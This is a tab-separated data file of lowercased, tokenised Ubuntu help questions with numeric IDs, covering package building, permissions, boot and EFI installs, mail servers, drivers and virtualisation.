270024	user permissions on upload directory	uploading files via my website fails because apache is not recognized as having write access . however , my permissions show otherwise . any ideas ? when uploading via script , the script returns error : directory is not writable directory is /home/username/public_html/uploads directory permissions are drwxrwsr-x directory is owned by username : webadmins apache is run as www-data and is a member of groups www-data webadmins what should i change so www-data ( apache ) is able to write to this directory ? thanks .
270025	libreoffice 4 skins ?	i read on the libreoffice here that said you could use firefox personas on libreoffice 4 . is this true , or did i mus-interpret this ?
270028	what would cause files not to be included in a .deb ?	i 'm trying to build a .deb package ( python ) as part of a larger project . i 'm able to successfully run 'make ' and 'make install ' on it , but when the package ( s ) are built ( using dpkg-buildpackage -rfakeroot ) , none of the .pyc files are included in the .deb . this , in fact , is the case for all the python packages inside this project . here is my .install file : usr/lib/python*/*/update/*.pyc usr/lib/python*/*/update/command/*.pyc usr/bin/update what would cause the *.pyc files to not be included in the .deb ? i see all the files in debian/tmp/usr/lib/python2.7/dist-packages/ ... , debian/update/usr/lib/python2.7/dist-packages/ ... , but there are no .pyc files in debian/update/debian/usr/lib/python2.7/dist-packages/ ...
270032	how do i disable window move with alt + left mouse button in xubuntu ?	title pretty much explains it all . i tried viewing other questions with the same topic , but none of the solutions work . i tried ccsm , and i de-ticked `` move window '' , nothing happened . i tried using gconf-editor to change /apps/metacity/general/mouse_button_modifier , but still , it did n't work . is there any solution ? i 'm using xubuntu , by the way .
270034	linux : how swap is reported by free/top . how to determine correctly swap usage by process	can somebody please explain how swap is reported in linux ? i 'm asking this because free and top commands reports some swap used that can not be found in /proc/ $ pid/status . grep -- color vmswap /proc/*/status reports 0 kb . any assistance would be greatly appreciated .
270036	is it safe to install ubuntu 64 bit 12.10 in efi mode on samsung series 7 windows 8 laptop ?	i have been reading about the issue of samsung laptops bricking when attempted booting from live usb . i have samsung series 7 np700z5c ( -s02ub to be specific ) laptop . it came with windows 8 preloaded . some posts claim that they disabled secure boot and installed ubuntu in efi mode . on the otherhand comments on this bug report state the issue to be with uefi implementation and not with secure boot . i really want to dual ubuntu with windows 8 . can someone help with uefi mode installation process ?
270039	why i ca n't put libreoffice icons on the desktop ?	having trouble putting libreoffice icons on the desktop . when i click and drag from the applications , the libreoffice icon does not appear correctly , and does not work . is there a fix for this ?
270040	applied maintenance to ubuntu 12.04 ( upgrade to kernel 3.2.0-39 ) ; after restart my desktop is not responding	after applying maintenance via update manager , my desktop freezes after a few seconds . there are two links on ubuntuforums that mentions this as well . is there anything i can do to correct this problem . btw , the only way i can use my computer is to telnet into it . it seems to be related to going to kernel 3.2.0-39. http : //ubuntuforums.org/showthread.php ? t=2127138 http : //ubuntuforums.org/showthread.php ? t=2127155 thank you .
270042	confusing disk space situation	my system primarily has windows 7 on it . a while ago , i switched from virtualboxing into linux to installing linux in its own partition . i thought i had lots of free space . however , ubuntu 's now telling me about not having enough space . now i can see that i have a folder called `` host '' , taking up 87 % of my hard drive , which , to my surprise , seems to be my windows partition . so , let me see if i understand this correctly : the amount of space i allocated for ubuntu was slightly larger than the amount of space i was using on my c : drive , and now fate has caught up with me ? does this make sense ? how do i fix this ? what i have done ? this is the output of df -h filesystem size used avail use % mounted on /dev/loop0 19g 18g 20m 100 % / udev 2.0g 4.1k 2.0g 1 % /dev tmpfs 801m 934k 800m 1 % /run none 5.3m 0 5.3m 0 % /run/lock none 2.1g 164k 2.1g 1 % /run/shm /dev/sda4 377g 130g 247g 35 % /host overflow 1.1m 13k 1.1m 2 % /tmp /dev/sda3 108g 82g 26g 77 % /media/12842f85842f6a85
270046	custom ubuntu gets stuck on lightdm	i recently used ubuntu builder to customize the ubuntu mini remix 12.10 . i added openbox , and some other stuff . i also added a guest user so that the livecd would n't be running root . after this , , it made sense to install lightdm as well . however , after building the livecd and running in virtualbox , i chose the `` try ubuntu without installing '' option , which gave me a lightdm screen . i tried to login in to the guest user ( and entered the correct password ) but it brought me back to the lightdm screen , and never on to openbox . how do i configure lightdm to not do this ? do i even need lightdm in the livecd ? help would be appreciated . thanks in advance . edit : never mind . i fixed the problem by adding the line : user-session=openbox to the file /etc/lightdm/lightdm.conf
270047	force google chrome upgrade ?	according to this site chrome 's current stable version for linux is 25.0.1364.172 since march 12 ( 2013 ) . it 's the 18th now and i still have version 24.0.1312.52 in my system . i 've tried : sudo apt-get upgrade google-chrome-stable but it says there 's nothing to upgrade . what 's the deal here ?
270049	how to run a command at login ?	i need to run the following command ( with real parameters ) after login : ssh -f user @ example.com -l 54321 : example.com:54321 -n i need it only for my user , not all users on the machine . also , i need it to run whether i login via the gui or via ssh to a plain shell terminal . i would even like to know how to do this on machines without a gui installed . where would i put the above line to be run as explained ?
270051	ubuntu 12.10 64-bit is not installing the libreadline-dev package	umair @ umair-pc : ~ $ sudo apt-get install libreadline-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libreadline-dev : depends : libreadline6-dev ( = 6.2-9 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . umair @ umair-pc : ~ $ sudo apt-get install libreadline6-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libreadline6-dev : depends : libtinfo-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . umair @ umair-pc : ~ $ sudo apt-get purge libtinfo-dev reading package lists ... done building dependency tree reading state information ... done package 'libtinfo-dev ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
270053	ubuntu laptop virtualbox 1920x1080 screen resolution resets after restart	in settings , under screen resolution , i could n't find my screen resolution , so i followed the steps here : http : //geekswithblogs.net/mapfel/archive/2012/03/06/148915.aspx that worked . however , i am having the same problem as the guy who commented : after a restart , the resolution goes back to how it was before , and the 1920x1080 option is gone . i 've looked at other answers to similar problems , but none of them seemed to help . can somebody please help me fix this ? thanks , undefinedmaster
270056	loaded ubuntu 12.10 from disc on a windows xp partition and i now ca n't see the partition to switch to ubuntu	just loaded ubuntu 12.10 from a disc to a partition i had created in windows . followed all the instructions during install about partitioning the drive etc and got to the end of the install and it wanted to be re-booted to check so turned it off and re-booted but i must be missing something as i ca n't see any of the ubuntu partition in windows now so my question is how do i boot in ubuntu ?
270057	how to make compiz wobbly effect ignore a single window ?	i have the reminders/alerts popup window with thunderbird/lightning calendar , that i need to avoid it being managed by wobbly compiz effect , because i already set another rule to make it have minimal size ( 25x70 ) when not maximized , and it seems to conflict with wobbly ; so it just wobbly every time i click and that is annoying ... but i can find no way to exclude that window from wobbly ... there is no option , and nobody in the whole internet seems to have asked that before : ) any tips ? thx !
270058	how to use old windows 7 install in ubuntu ?	i have decieded to convert my windows 7 laptop to ubuntu . i virtualized the windows 7 install and i thought i read that there is a way to launch the apps that are in my windows 7 vhd inside ubuntu using vmware in some way . am i correct or do i just have to run my old windows 7 as a vm through virtualbox/vmware ?
270061	how do i set ubuntu as my default os on a chromebook ?	i recently downloaded ubuntu for my samsung 5 chromebook from : http : //cr-48-ubuntu.googlecode.com/files/install-ubuntu-1204-7.sh whenever i restart the computer , it goes back to chrome os . how can i make it so that it boots into ubuntu ?
270065	unity dash extremely laggy	i 'm running 12.04 64bit . i 've been running gnome shell for a while and decided to give unity a try . i logged out and back in with the unity shell selected . i noticed that , sometimes when i press the super key , the dash takes about 0.5 to 1 second to open and it is extremely slow while searching/typing in it . i 'm guessing gnome-shell messed something up . also , another minor issue is when i right-click the desktop and click `` change desktop wallpaper '' , it simply opens the system settings , not any wallpaper options . what 's going on ?
270066	ultrabook or thin laptop with great battery life for ubuntu	any recommendations on a great ultrabook or thin-enough laptop with great battery life for running ubuntu ?
270068	where can i download ubuntu for intel ?	i ca n't find an ubuntu installer to format the pc and install it .
270073	what version of ubutu should i install for upgrade , this is my computers capacity	i now have release 9.04 ( jaunty ) kernel linux 2.6.31-2-686 gnome 2.26.1 hardware memory 2.0 gib processor 0 : intel ( r ) atom ( tm ) cpu n270 @ 1.60ghz processor 1 : intel ( r ) atom ( tm ) cpu n270 @ 1.60ghz system status available disc space 270.7 gib
270076	i need the best/most secure supported jre for libreoffice	i want to utilize the java supported functions of libreoffice ( database/macros ) , but i know java is known to be insecure ( notably the latest , cross-platform , zero-day exploit ) . what is the best version of jre to install that is the most compatible , but also secure ?
270077	install ubuntu on 24gb ssd while installing ubuntu 's programs on secondary hdd	what is the best approach to install ubuntu beside windows 8 while having a 24gb ssd and a 1tb hdd . currently windows 8 is installed to the 1tb hdd . i want to have ubuntu on the ssd and i want to install the programs for ubuntu on a hdd . what would be the best approach ? thanks ,
270080	set up domain name on private server	i have a linux server ( ubuntu 12.04 ) i 'm using to learn as much as i can about server management . i 've got as far as getting a full lamp setup running , but have hit a dead end trying to get a domain name to point to my server . i 've set up a virtual host in an apache .conf file , and set up the ip address in the hosts file with the domain name , and have pointed the a record to the ip address with no luck . i 've also installed bind9 , but thought i 'd see if i 'm going in the wrong direction rather than messing anything up with that . what is the best way to get a domain name up and running - ideally in a way that would be production ready rather than a temporary setup edit : thanks for the tips - just to better inform the situation - i have a few spare domain names registered that i can use , and i 'm renting a vps to play with . currently i have the dns * and @ a record pointing to the ip , but the nameservers are with the registrar if that makes a difference ?
270084	how can i share the internet connection via wi-fi direct ?	android does n't support ad-hoc wireless connections , but it does support a technology i 'm not familiar with called wi-fi direct : how can i use this to access my ubuntu laptop 's internet connection ?
270086	create custom plymouth splash	can i create a custom plymouth boot splash ? i like the current one ( at least i did before it broke ) but i would like to try to make my own . is this possible , or am i trying something only super-duper-power-users-developing-at-canonical dudes should try ? edit : - new info i believe i may have some broken links with plymouth . maybe this will help ? edit-2 : - useful post how to roll back to original plymouth splash this is basically what i 'm getting , but how do i fix the links . my exact error : update-alternatives : warning : forcing reinstallation of alternative /lib/plymouth/themes/orange because link group default.plymouth is broken . update-alternatives : warning : not replacing /lib/plymouth/themes/default.plymouth with a link . when i run this command : nate @ texno-satellite-a105 : /lib/plymouth/themes $ ls -l default.plymouth i get this : -rw-rw-r -- 1 nate nate 233 oct 14 18:29 default.plymouth
270087	inter process communication with asynchronous notification	i trying to set up two daemons , a client and a server , the server profiles some system statistics , and waits in a non blocking manner for a sigio to be received , upon which it will read the data sent to it , send something back to the client and continue onwards with whatever it was doing . the client however issues blocking send and receive functions on its socket . i have done quite a bit of coding , and read extensively , but it appears there are a lot of different paradigms that people use when trying to achieve this kind of behaviour , i would really appreciate some help , here is my code so far : server : int s , s2 , flags , n ; struct sockaddr_un addr ; struct sockaddr_un from ; int from_len ; socklen_t len ; void message_received_helper ( int sig ) { syslog ( log_notice , `` works ! \n '' ) ; } ... int main ( int argc , char *argv [ ] ) { deamonize ( ) ; /* daemon-specific initialization goes here */ setlogmask ( log_upto ( log_notice ) ) ; openlog ( `` i_aware '' , log_cons | log_pid | log_ndelay , log_local1 ) ; syslog ( log_notice , `` program started by user % d '' , getuid ( ) ) ; /* * this set up is for the non blocking socket that will exist on the server */ /* specify the new action for the sigio signal */ new_action.sa_handler = message_received_helper ; /* supply the empty set to .sa_mask */ sigemptyset ( & new_action.sa_mask ) ; /* no flags*/ new_action.sa_flags = 0 ; /* associate new_action with the signal sigio - null indicates we are not saving any previous action*/ if ( sigaction ( sigio , & new_action , null ) < 0 ) { syslog ( log_notice , `` could not associate sigio with action ... \n '' ) ; exit ( errno ) ; } /*todo create unix domain socket and listen for a connection*/ if ( ( s = socket ( af_unix , sock_stream , 0 ) ) < 0 ) { syslog ( log_notice , `` could not create socket : % d \n '' , errno ) ; perror ( `` socket '' ) ; exit ( errno ) ; } /* bind socket */ addr.sun_family = af_unix ; strcpy ( addr.sun_path , `` /dev/foo '' ) ; unlink ( addr.sun_path ) ; len = ( socklen_t ) ( strlen ( addr.sun_path ) + sizeof ( addr.sun_family ) ) ; if ( bind ( s , ( struct sockaddr * ) & addr , len ) == -1 ) { syslog ( log_notice , `` could not bind socket % d \n '' , errno ) ; perror ( `` bind '' ) ; exit ( errno ) ; } /* listen */ if ( listen ( s , 1 ) < 0 ) { syslog ( log_notice , '' error on listen : % d \n '' , errno ) ; perror ( `` listen '' ) ; exit ( errno ) ; } from_len = sizeof ( from ) ; if ( s2 = accept ( s , ( struct sockaddr * ) & from , & from_len ) < 0 ) { syslog ( log_notice , '' error on accept : % d \n '' , errno ) ; perror ( `` accept '' ) ; exit ( errno ) ; } syslog ( log_notice , '' success \n '' ) ; /* set the ownership of the socket fd to this process */ syslog ( log_notice , `` f_setown : % d \n '' , fcntl ( s2 , f_setown , getpid ( ) ) ) ; /*get file access mode and file status flag - no args needed for this f_getfl comand*/ flags = fcntl ( s2 , f_getfl ) ; syslog ( log_notice , `` f_getfl : % d \n '' , flags ) ; /* enable non blocking */ syslog ( log_notice , `` f_setfl : % d \n '' , fcntl ( s2 , f_setfl , flags | fasync ) ) ; /* * at this point the socket described by s2 , should be a non blocking socket , when a sigio * is raised upon receipt of data waiting on the socket the method message_received_helper * will be called */ n = recv ( s2 , str , 1 , 0 ) ; syslog ( log_notice , `` works ! \n '' ) ; if ( n < = 0 ) { if ( n < 0 ) syslog ( log_notice , `` recv error : % d '' , errno ) ; } syslog ( log_notice , `` n : % d , s2 : % d , str : % s \n '' , n , s2 , str ) ; if ( send ( s2 , str , n , 0 ) < 0 ) { syslog ( log_notice , `` send : % d '' , errno ) ; } client : int s , s2 , t , len ; struct sockaddr_un local , remote ; char str [ 100 ] ; if ( ( s = socket ( af_unix , sock_stream , 0 ) ) == -1 ) { perror ( `` socket '' ) ; exit ( 1 ) ; } local.sun_family = af_unix ; strcpy ( local.sun_path , sock_path ) ; unlink ( local.sun_path ) ; len = strlen ( local.sun_path ) + sizeof ( local.sun_family ) ; if ( bind ( s , ( struct sockaddr * ) & local , len ) == -1 ) { perror ( `` bind '' ) ; exit ( 1 ) ; } if ( listen ( s , 5 ) == -1 ) { perror ( `` listen '' ) ; exit ( 1 ) ; } for ( ; ; ) { int done , n ; printf ( `` waiting for a connection ... \n '' ) ; t = sizeof ( remote ) ; if ( ( s2 = accept ( s , ( struct sockaddr * ) & remote , & t ) ) == -1 ) { perror ( `` accept '' ) ; exit ( 1 ) ; } printf ( `` connected.\n '' ) ; done = 0 ; do { n = recv ( s2 , str , 100 , 0 ) ; if ( n < = 0 ) { if ( n < 0 ) perror ( `` recv '' ) ; done = 1 ; } if ( ! done ) if ( send ( s2 , str , n , 0 ) < 0 ) { perror ( `` send '' ) ; done = 1 ; } } while ( ! done ) ; close ( s2 ) ; the two processes are able to connect over the socket , but no sigio is raised when the client sends data to the server . also the recv ( ) function keeps blocking , as though nothing i did affected the socket s2 to make reads non blocking .
270098	problem installing 12.04 in efi mode	edit : i was told that my question was confusing and could n't be understood . i 'm completely rewriting it so it will make sense . same question , just rewiting it . here it is ... - > i 'm installing a 64 bit ubuntu 12.04 desktop as a uefi install . i 've been using the 64 bit alternate install cd . right after the partitioning step i get the following error . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | [ ! ! ] partition disks | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - the attempt to mount a file system with type vfat in scsi1 ( 0.0.0 ) , partition # 1 ( sda ) at /boot/efi failed . you may resume partitioning from the partitioning menu . do you want to resume partitioning ? < go back > < yes > < no > - > the layout i 've chosen is to have / in a logical volume on top of raid . i know this is possible but is more challenging . - > after reading up on a web site i was given , i think the best option is to install without any boot loader then install the boot loader manually after that . i need some feedback on that . - > if i follow that plan , i need to know what to put in the esp ( ie : kernel ? bootloader ? initrd ? ) . - > if i follow that plan , i also need to know more detail about how to configure things and how to create the initrd properly so i can get at / in the boot process . // =============================================== // = > information about the current partition layout : ( it is gpt on all disks ) // =============================================== // there are 3 , 3 tb disks in the desktop machine i 'm installing on . partitioning , the boot flag , and partition types were done using gparted live ( version : gparted-live-0.14.1-6-amd64 ) . /dev/sda1 is intended for the esp ( formatted in fat 32 @ 250 mib/ 262 mb ) there are sdb1 and sdc1 which are the same size as /dev/sda1 ( 250 mib ) . they are unformatted , and are just there as spacers so that the partitions following start in about the same pace on those disks . sda2 , sdb2 and sdc2 are just under 3 tb each ( the lions share of the avialable disk space ) swap partitions sda3 , sdb3 and sdc3 are roughly 5.3 mib each raid 5 ( /dev/md0 ) was set up using the partitioner in ubuntu installer but not initialized/ built yet . it includes sda2 , sdb2 , and sdc2 . a volume group and logical volumes were created on /dev/md0 , using the partitioner in the ubuntu installer . those logical volumes are ... /system/root ( place for the core system to reside @ 512 mib/ 500 mb ) and other 's ... // ============================================== // i think the best option is to install without any boot loader then install the boot loader manually after that . i need some feedback on that . i need to know what to put in the esp ( ie : kernel ? bootloader ? initrd ? ) . i also need to know more detail about how to configure things and how to create the initrd properly so i can get at / in the boot process .
270109	ubuntu 12.10 wo n't allow admin privileges when password is set to none	i have the drivers for wireless in ubuntu 12.0 for my inspirion 1521 , i set the password to `` none '' to be required whenever i start my computer . however now i can not run the drivers without a password . nor can i create one in the settings . how do i run the drivers if i ubuntu no longer recognizes me as admin ?
270115	how would i run a script or application when idle ?	i would like to run various cryptocurrency generators , `` miners '' as they are known as , whenever my main pc is idle more then 30 minutes ( no mouse or keyboard activity , etc. ) . how would i set this up ? edit : have n't picked what miners i 'd use but i want to mine for bitcoin , litecoin , and namecoin right now .
270119	restore , refresh , or reset your pc like windows 8	in windows 8 there are the options to restore , refresh or reset your pc . restore : `` if you think an app or driver that you recently installed caused problems with your pc , you can restore it back to an earlier point in time '' refresh : `` if your pc is n't performing as well as it once did , and you do n't know why , you can refresh your pc without deleting any of your personal files or changing your settings . '' reset : `` if you want to recycle your pc , give it away , or start over with it , you can reset it completely . '' what would be the equivalent in ubuntu or how is ubuntu different so that it would not even be necessary . i think to 1. and 3. there are already answers : 1 . is there such a thing as a restore point in ubuntu ? 3. clean install to 2 . ( refresh ) i have n't found anything . is this maybe one of the advantages of ubuntu that it 's not even necessary to perform any task like that ?
270124	what is the best way to trigger scripts or actions when the computer is disconnected from the network ?	i am running 12.04 lts . there are a number of shared resources that i use that are housed remotely on a local server . when disconnected from the network ( on say a network , or router failure ) , i would like to dynamically archive , rename , and un-archive directory backups to continue the use of these shared assess until the network is restored . is there a preferred method of gaining this data and triggering scripts or other system actions when the connected state changes ? edit : after some additional research i see that there is the possibility of doing this with udev from triggering an action when a specific volume is connected . however is this the best way ? also is there an alternative tool for udevinfo ? it does not appear to be part of the package .
270134	radeon hd 6850 incorrect graphics drivers ? ubuntu 12.10	this all started when the ubuntu update center said my computer needed updates . i agreed , and when the updates were finished it required a reboot . upon rebooting i tried logging in , and when i saw the desktop there was no toolbar or launcher . i googled it a bit , and found a tutorial similar to this : http : //www.ubuntuvibes.com/2012/10/how-to-install-amd-catalyst-legacy.html little did i know , these drivers were for radeon hd 2xxx-4xxx series . i followed the tutorial and then rebooted . after rebooting it came up with a screen that says `` the system is running in low graphics mode '' i tried some tutorials here : how to fix `` the system is running in low-graphics mode '' error ? but to no avail . after booting into every command i try i always tells me to run 'apt-get -f install ' every time i try this command i get : 'errors were encountered while processing : /var/cache/apt/archives/fglrx-legacy_2 % 3a8.97.100.7-makson~ppa1_amd64.deb' 'e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ' p.s . i am very new to ubuntu , and linux . i have mostly used windows . i am using ubuntu 12.10 .
270138	no admin user on fresh wubi install	i just installed wubi fresh ( win 7 ; ubuntu 12.10 ) . after booting into ubuntu for the first time , my first instinct is to : sudo apt-get update & & sudo apt-get upgrade however , i 'm quickly prompted with : [ user ] is not in the sudoers file . this incident will be reported . i checked user settings and it appears that there are no admin accounts : how can i resolve this ? and why did wubi set me up with a non-admin account ?
270142	icons and bars on desktop not showing	i am using ubuntu 12.10 and today after i updated my software , when the computer restarted , the icons and menu bars on the desktop did not show . the a icons on the desktop itself still showed but nothing else ( no launcer buttons , no time , nothing ) . im not sure exactly what caused this . i could not find anything anywhere else . i tried the compiz ccsm unity thing but to no avail . it tells me that unity is running . i tried to unity -- reset but i just get told that it is deprecated . im not sure what to do .
270143	can not update ubuntu - failed to fetch error	when update crashes i got this message : w : failed to fetch http : //cran.at.r-project.org/dists/precise-backports/main/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
270149	how to install stormcloud from source ?	i want to install the weather app stormcloud from the source on github ( found here ) https : //github.com/consindo/stormcloud i downloaded the zip file and opened the readme file inside it . it told me to download node-webkit and to drag stormcloud to node-webkit . i do n't understand what it is asking me to do . can anyone help ?
270152	are there any lvm gotchas ?	i have been playing around with lvm on a virtual machine . until now i have found only advantages on it and i 'm thinking about using it on my real machine the next time i do a fresh install . i have never used it on a `` real life '' scenario , so are there any shortcomings that i must be aware of , like performance penalties or harder management ( e.g . : backup and recovery ) ?
270153	importing songs from rhythm box to ipod does n't work properly	i have imported songs from rhythm box to my ipod ( 32 gb , 2nd generation ) . i can play them on the ipod without problem , but when i try to browse into the song ( to go from 1 min to 5min for eg . ) , the song starts from the beginning ( but the time continues at 5 min ) . makes me think that the index of the file is corrupted . but i even do n't know if such an index exists . strangely , on rhythmbox or mplayer or whatever , everything goes fine . did anybody experience that ? how can i solve this ?
270156	how to map wacom correctly to monitor	i am using ubuntu 12.10 and i am running dual screens ( 23inch and 15 inch ) . i have a wacom intuos 2 9x12 that will will not map correctly to my second monitor which is also 9x12 ( 1400x1050 ) . the reason i need to solve this is because i have created a homemade cintiq and i draw on the screen ( you can see what i 'm talking about here : http : //forum.bongofish.co.uk/index.php ? topic=2096.0 ) . the pen matches quite accurately on the x axis of my screen , so i believe the width of my wacom tablet area is okay . i think the problem is the y axis of my wacom . the cursor matches my pen towards the bottom of the screen , but as i move to the top of the screen , the distance from my pen tip to the cursor increases ( the cursor is about 1 inch below pen when at top of screen ) . i have looked on the internet for hours trying to find a solution and i can not find any . also , i want to say that this problem only happens in ubuntu , i also have windows 7 installed , and the wacom matches the screen perfectly . i 'm also a complete noob to linux so i do n't know much about navigating terminal .
270157	how fast should fsck be ?	i 've tried checking my system drive using both touch /forcefsck and fsck from a dvd boot of ubuntu , and both times it 's been done remarkably quickly ; like a few seconds for a 101 gb partition . is that ... normal ? this is being done due to some slightly odd behaviour on my computer -- a disappearing grub , and the failure of the computer to boot beyond powering up once or twice . the filesystem is well-established ( a partition on a 500 gb drive ) , and the computer works normally when it boots , so i was trying to fsck for drive errors .
270159	installing ubuntu on windows xp	i want to put ubuntu 12.10 on a sandisk cruzer 4gb usb flash drive , and then plug in the flash drive to my dell dimension 3000 so i can boot off the flash drive and install ubuntu . how do i do this ? help me .
270160	how do i solve a `` an error occured while mounting /sys/bus/usb/drivers . '' error ?	i have got this message during the startup ubuntu 12.04 : an error occured while mounting /sys/bus/usb/drivers . press s to skip mounting ... and so on ... any help will be appreciated !
270162	install vmware under wubi ubuntu 12.04	i had installed ubuntu 12.04 on my win 7 64bit using wubi with success . but here i have a big problem to install vmware 9.0.0 or vmware 8.1.0 under ubuntu 12.04 , always in get crashed to complete the vmware installation so please let me know the steps and the versions which i can follow to install vmware on `` ubuntu 12.04 ''
270164	trying to use sshfs on ubuntu	i 'm trying to use sshfs on ubuntu . i have root access on the server i 'm trying to connect to . but everytime i try to connect using my ubuntu laptop , the message i get is the following : cp @ cp-aoa150 : / $ sudo sshfs root @ myserver : / /home/cp/documents/myserverfolder/ read : connection reset by peer cp @ cp-aoa150 : / $ i 'm not too familiar with ubuntu / linux but could the problem be that the key that 's on the server is not for the user `` cp '' ? if this is the case , how do i set up the root account on ubuntu ? any suggestions would be appreciated . btw . i can ssh into the box no problems , but as root . so in other words , this works : ssh root @ myservername i 've copied over my key file from work onto this new laptop . it 's just sshfs that is n't happy right now . thanks . edit 1 when i run sshfs with debug options like so : cp @ cp-aoa150 : ~ $ sshfs -o sshfs_debug -p 22 root @ 10.14.5.182 : / /home/cp/documents/myserverfolder/ i get the following error message : sshfs version 2.4 fusermount : user has no write access to mountpoint /home/cp/documents/myserverfolder/ cp @ cp-aoa150 : ~ $ i 've checked the permissions on the folder myserverfolder and it looks like this : ( results of ls -la command ) drwxr-xr-x 2 root root 4096 mar 19 17:11 . drwxr-xr-x 4 cp cp 4096 mar 19 17:11 .. edit 2 i 've ensured that the user cp is a part of the fuse group . cp @ cp-aoa150 : ~ $ sudo addgroup cp fuse [ sudo ] password for cp : the user `cp ' is already a member of `fuse ' . cp @ cp-aoa150 : ~ $ edit 3 results of ls -ld cp @ cp-aoa150 : ~ $ ls -ld /home/cp/documents/myserverfolder drwxr-xr-x 2 root root 4096 mar 19 17:11 /home/cp/documents/myserverfolder cp @ cp-aoa150 : ~ $ i 'm not too familiar yet with linux but i did try to create a file in this folder using vim . i was n't able to save the file ... i think i created the folder using the `` sudo `` prefix to the mkdir command ... because when i try without sudo , i get a `` permission denied '' error message . i 'm going to google `` chmod '' to see how i can grant permissions to cp on this folder .
270167	how to install virtual box on ubuntu	can someone help me install virtual box on my ubuntu machine ? ( 12.10 ) . i know you can install it from the software centre but i read somewhere that their are more files to add or something ? can someone help me please ? all help will be greatly appreciated ! thank you so very much ! have a wonderful day ! cody .
270170	postfix mail for mydomain.com loops back to myself problem	i 'm using vps server with ubuntu 10.04 when i send email to gmail it 's ok but for hotmail fails , i check my logs i find this : mar 19 18:09:01 mail postfix/smtp [ 6340 ] : 8faf722294 : to= < root @ mydomain.com > , orig_to= < root > , relay=none , delay=0.09 , delays=0.08/0.01/0/0 , dsn=5.4.6 , status=bounced ( mail for mydomain.com loops back to myself ) i look around inforums to find the solution but in vain even i changed my postfix settings : my destination setting was like this mail.mydomain.com , localhost.mydomain.com , , localhost i changed it to this $ mail.mydomain.com , localhost , localhost.mydomain.com , mydomain.com i made many variations but still not working . the output of cat /etc/mailname mail.mydomain.com the output of postconf -n : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all inet_protocols = ipv4 mailbox_size_limit = 0 milter_default_action = accept milter_protocol = 2 mydestination = localhost. $ mydomain.com , localhost , mail.mydomain.com myhostname = mail.dimonos.info mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 ip myorigin = $ mydomain non_smtpd_milters = inet : localhost:8891 readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_milters = inet : localhost:8891 smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes
270172	how can i make a .jar file executable ?	i 'm trying to run a jar application under ubuntu , so i installed openjdk java 7 runtime , but when i open this application i got this message : the file '/home/aimad/programms/jmerise/jmerise.jar ' is not marked as executable . if this was downloaded or copied from an untrusted source , it may be dangerous to run . for more details , read about the executable bit .
270178	how can i merge unversioned monodevelop code back into a git repository ?	my group partner and i are creating a mysql database application with a gtk # frontend . our application consists of a main window with information displayed in multiple tabs . my partner started most of the implementation , then he gave me a copy of the project folder so i could implement half of the tabs and he could do the other half . now we want to merge our work back together , but we were n't using source control ( yeah , yeah , i know ... ) and we are n't sure how to easily smush them back together by hand . his portion of the code is now hosted on github , and we 're wondering how we might use git to merge my unversioned code in with his . any suggestions ?
270185	is there a way to decrypt epm files using ubuntu ?	the government agency i work with sends me files encrypted with epm . i have the passwords . is there a way to decrypt these files using linux ?
270187	wubi 's error while installin ubuntu 12.10 on windows 7	i got an error while using wubi to install ubuntu 12.10 on windows7 and all the instructions were correct , the error said ( 'nonetype ' object has no attribute 'get_into ' ) please help and thanks
270188	.deb package creation . why are my files not being installed ?	i 'm a newbie with package creation so please feel free to slap me down as needed : ) . in any case , i wanted to create a package that would install and set up all of specific ldap related packages and config files ( heavily customized ) . the problem that i 'm having is that my ldap.conf configuration file will not install onto the local system when doing an gdebi `` package name '' . i 'm expecting that the ldap.conf file will be copied into /etc . here is my structure ( created from dh_make ) : root @ clientb-16 : ~/navldapubuntu-0.1 # ls debian ldap.conf root @ clientb-16 : ~/navldapubuntu-0.1 # cd debian root @ clientb-16 : ~/navldapubuntu-0.1/debian # ls changelog control docs files readme.debian rules navldapubuntu navldapubuntu.doc-base.ex compat copyright etc install readme.source source navldapubuntu.debhelper.log navldapubuntu.substvars root @ clientb-16 : ~/navldapubuntu-0.1/debian # i have an ldap.conf file in the top level directory and specified it in the install file as follows : root @ clientb-16 : ~/navldapubuntu-0.1/debian # more install ldap.conf etc it 's definitely in the package after doing a `` dpkg -- contents '' ... am i way off base ? i thought files would automatically get installed . please help a newb ! ! :
270189	i ca n't find install guest additions option for virtualbox	i have installed virtualbox 4.1.18 on ubuntu 12.10 and i hosted windows xp . i want to share a folder between ubuntu and windows xp , so i have read about it in this external tread . the problem is when i 'm trying to access to the install guest additions option i ca n't find the devices menu , when i 'm focusing the guest machine .
270192	ubuntu repository mysql5.5 vs orace mysql5.5	ubuntu repo mysqld executable file size = 12 mb . mysqld downloaded from oracle website ~= 50 mb . i compiled mysqld and the size again came out to be ~= 50mb mysqld 5.6 file size ~= 90mb how is it that ubuntu repo mysqld is so small in size . what flags are used during compilation ?
270202	how can i make yed look more integrated into ubuntu ?	yed is a powerful graph editor that is coded in java and supports a variety of platforms , including ubuntu . however , by default it looks quite alien to the ubuntu desktop as it does n't appear to use a gtk theme . unfortunately there is no setting to change is . is there anything i can do to make yed more integrated into the ubuntu desktop ?
